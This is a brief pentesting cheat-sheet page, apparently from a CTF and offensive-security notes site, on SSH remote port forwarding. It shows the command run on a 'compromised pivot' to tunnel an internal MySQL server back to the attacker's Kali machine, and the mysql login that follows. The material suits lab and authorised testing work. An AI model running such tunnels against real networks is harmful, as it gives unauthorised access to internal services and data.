>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Everywhere Tunnels / SSH Remote Port Forwarding (-R)

SSH Remote Port Forwarding (-R)

Everywhere Tunnels SSH Tunneling linux windows

Useful when only outbound SSH from the victim is allowed.

Forward a service from inside the network back to Kali

On the compromised pivot:

ssh -N -R 127.0.0.1:3456:10.8.20.130:3306 kali@192.168.118.12

On Kali listen on localhost:3456, packets travel back through the tunnel to the pivot, then on to DBMASTER:3306.

Use it

mysql -h 127.0.0.1 -P 3456 -u dbroot -p